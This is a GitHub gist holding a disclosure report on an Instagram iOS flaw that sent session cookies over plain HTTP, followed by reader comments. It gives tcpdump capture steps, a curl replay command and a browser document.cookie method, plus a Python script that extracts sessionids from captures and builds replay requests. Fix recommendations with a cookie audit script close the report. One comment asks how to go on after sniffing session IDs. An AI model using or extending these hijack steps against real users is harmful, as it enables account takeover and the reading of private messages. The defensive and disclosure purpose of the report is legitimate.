Last active February 24, 2023 20:44
FB Responsible Disclosure

Instagram iOS session hijack

The Instagram iOS app makes API calls to non-HTTPS endpoints and sends the session cookie in the request headers of those calls, so anyone who can observe the traffic can take over the session completely.

Steps to reproduce (on Mac OS X):

  • Join an open or WEP-encrypted Wi-Fi access point
  • Put the wireless interface into monitor mode and capture packet payloads as ASCII, filtering on traffic to the API host (-I enables monitor mode in the OS X tcpdump, -n skips name resolution, -A prints the payload as ASCII):
     sudo tcpdump -In -i en0 -s 2048 -A dst
  • Wait for someone to use the Instagram iOS app on the same network
  • Extract the Cookie request header from the captured output
  • Use the sessionid cookie value to make any API call as that user, including HTTPS endpoints such as direct messages:
     curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \
      -H 'Cookie: sessionid=REDACTED' \

This returns the user's direct message inbox as JSON.
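The capture-and-replay steps above, as an added example that is not part of the original report: a Python script that finds HTTP requests in `tcpdump -A` text, pulls the sessionid out of the Cookie header and builds the replay headers and the equivalent curl command. The capture text is constructed to look like tcpdump output; the hosts, paths and the sessionid value in it are placeholders, and the URL handed to `curl_command` is a placeholder too, since the report's endpoint URL is not reproduced above.

```python
"""Extract the session cookie from a cleartext HTTP request captured with
`tcpdump -A` and turn it into the replay request described in the report.

Added example, not code from the original gist. The capture below is
constructed; every host, path and cookie value in it is a placeholder.
"""
import re
import shlex

# Constructed sample of two requests seen on the same open Wi-Fi: the app
# talking to the API over plain HTTP with its cookies attached, and an
# unrelated request with no Cookie header. The "E..X..@.@..." bytes are the
# IP/TCP header noise tcpdump -A prints in front of the ASCII payload.
CAPTURE = (
    "12:00:01.000000 IP 192.168.1.23.51234 > 203.0.113.10.80: Flags [P.], seq 1:612, ack 1, win 4096\n"
    "E..X..@.@.....GET /api/v1/feed/timeline/ HTTP/1.1\r\n"
    "Host: i.instagram.com\r\n"
    "User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+\r\n"
    "Cookie: csrftoken=abc123; sessionid=1234567890%3AdeadbeefCAFE%3A1; ds_user_id=1234567890\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "12:00:01.050000 IP 192.168.1.23.51235 > 198.51.100.7.80: Flags [P.], seq 1:80, ack 1, win 4096\n"
    "E..P..@.@.....GET /weather.json HTTP/1.1\r\n"
    "Host: example.net\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

# A request line followed by header lines up to the first blank line.
# Not anchored at line start, because tcpdump prints header bytes before it.
REQUEST_RE = re.compile(
    r"(?P<method>GET|POST|PUT|DELETE|PATCH) (?P<path>\S+) HTTP/1\.[01]\r?\n"
    r"(?P<headers>(?:[^\r\n]+\r?\n)*?)\r?\n"
)


def parse_headers(raw: str) -> dict[str, str]:
    """Header block -> {lowercased name: value}."""
    headers = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep and name:
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_cookie(header: str) -> dict[str, str]:
    """Cookie request header -> {name: value}."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def extract_sessions(capture: str) -> list[dict[str, str]]:
    """Every cleartext request in the capture that carried a sessionid cookie."""
    found = []
    for m in REQUEST_RE.finditer(capture):
        headers = parse_headers(m.group("headers"))
        cookies = parse_cookie(headers.get("cookie", ""))
        if "sessionid" not in cookies:
            continue
        found.append({
            "host": headers.get("host", ""),
            "path": m.group("path"),
            "user_agent": headers.get("user-agent", ""),
            "sessionid": cookies["sessionid"],
        })
    return found


def replay_headers(session: dict[str, str]) -> dict[str, str]:
    """Only the sessionid is needed: the API authenticates any endpoint,
    HTTP or HTTPS, on that single cookie."""
    return {
        "User-Agent": session["user_agent"],
        "Cookie": f"sessionid={session['sessionid']}",
    }


def curl_command(session: dict[str, str], url: str) -> str:
    """The curl invocation from the report, shell-quoted, for a given URL."""
    parts = ["curl"]
    for name, value in replay_headers(session).items():
        parts += ["-H", f"{name}: {value}"]
    parts.append(url)
    return " ".join(shlex.quote(p) for p in parts)


if __name__ == "__main__":
    for s in extract_sessions(CAPTURE):
        print(f"{s['host']}{s['path']} -> sessionid={s['sessionid']}")
        # Placeholder URL: the report's actual endpoint is not reproduced here.
        print(curl_command(s, "https://i.instagram.com/ENDPOINT"))
```

Only the request to the API host is reported; the second request has no Cookie header and is skipped, which is the filtering you would do over a real capture before replaying anything.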

I was able to perform a session hijack on my own account on my laptop while someone else browsed Instagram on my iPhone.

I was also able to:

  • take the cookie sniffed from the iOS app
  • go to as a logged-out user
  • set document.cookie = $COOKIE
  • navigate to a profile
  • see that I'm logged in as that user

There is some screwy behaviour where '' gets into a redirect loop; I will see if I can fix that. However, going to '' works and shows me as logged in.

I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.


  • Use SSL everywhere (every API endpoint, not only the ones carrying obviously sensitive data, since the cookie is sent on all of them)
  • Revoke all logged-in sessions? (any sessionid already captured stays valid until it is invalidated server-side)
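The two recommendations above, as an added example that is not part of the original report: a minimal model of the rule a standards-compliant cookie jar applies when deciding whether to attach a cookie to a request, with the weak setting (a session cookie issued without the Secure attribute, which is what the behaviour in the report implies) beside the hardened one. The Set-Cookie lines are constructed; the report does not say which attributes Instagram's real cookie carried, and the cookie value is a placeholder.

```python
"""Why "use SSL everywhere" is best paired with the Secure attribute on the
session cookie.

Added example, not code from the original gist. Models RFC 6265's
domain, path and Secure checks on the cookie-jar side; the Set-Cookie
values are constructed placeholders.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class StoredCookie:
    name: str
    value: str
    domain: str           # host the cookie belongs to
    host_only: bool       # True when Set-Cookie carried no Domain attribute
    path: str = "/"
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header: str, request_host: str) -> StoredCookie:
    """Parse the parts of a Set-Cookie header that matter for this check."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = StoredCookie(name=name.strip(), value=value.strip(),
                          domain=request_host.lower(), host_only=True)
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain" and val:
            cookie.domain = val.lstrip(".").lower()
            cookie.host_only = False
        elif key == "path" and val.startswith("/"):
            cookie.path = val
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
    return cookie


def domain_matches(cookie: StoredCookie, host: str) -> bool:
    host = host.lower()
    if cookie.host_only:
        return host == cookie.domain
    return host == cookie.domain or host.endswith("." + cookie.domain)


def path_matches(cookie: StoredCookie, path: str) -> bool:
    if path == cookie.path:
        return True
    if cookie.path.endswith("/"):
        return path.startswith(cookie.path)
    return path.startswith(cookie.path + "/")


def will_send(cookie: StoredCookie, url: str) -> bool:
    """Would a cookie jar attach this cookie to a request for url?
    The Secure line is the only difference between the two settings."""
    u = urlsplit(url)
    if not domain_matches(cookie, u.hostname or ""):
        return False
    if not path_matches(cookie, u.path or "/"):
        return False
    if cookie.secure and u.scheme != "https":
        return False
    return True


def audit(cookie: StoredCookie) -> list[str]:
    """Findings a reviewer would raise for a session cookie."""
    findings = []
    if not cookie.secure:
        findings.append("missing Secure: sent in the clear to any http:// endpoint")
    if not cookie.httponly:
        findings.append("missing HttpOnly: readable from script")
    return findings


# Constructed: the weak issuance and the hardened one, both from i.instagram.com.
WEAK = parse_set_cookie("sessionid=REDACTED; Path=/; HttpOnly", "i.instagram.com")
HARDENED = parse_set_cookie("sessionid=REDACTED; Path=/; Secure; HttpOnly", "i.instagram.com")

if __name__ == "__main__":
    for label, c in (("weak", WEAK), ("hardened", HARDENED)):
        print(label,
              "http:", will_send(c, "http://i.instagram.com/api/v1/x/"),
              "https:", will_send(c, "https://i.instagram.com/api/v1/x/"),
              audit(c))
```

Two caveats. A native app that builds its own Cookie header does not consult jar rules at all, so the Secure attribute is defence in depth; the endpoints themselves have to be HTTPS, which is the first recommendation. And none of this helps a sessionid that has already been captured, which is why the second recommendation exists.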

rmrhz commented Jul 28, 2014

That's a nice catch.

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

Got the instasheep domain name if you want me to point it at a github repo.

anands commented Jul 30, 2014

netpawn commented Jul 31, 2014

As I read it, it works only on Mac though... right?

boserup commented Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

The tool is for what platform? PC, Mac, Android?

@Mamugian could work on any unix/linux platform.

@jlopez1286 Seriously? tcpdump. Didn't expect to see such a question on this gist.

I'm not really experienced with packet sniffing and all this advanced networking stuff, but I was able to do the packet sniffing on an unsecured network using Wireshark and get the session ID from the cookie headers. What do I have to do from here? I would be grateful if anyone could help.
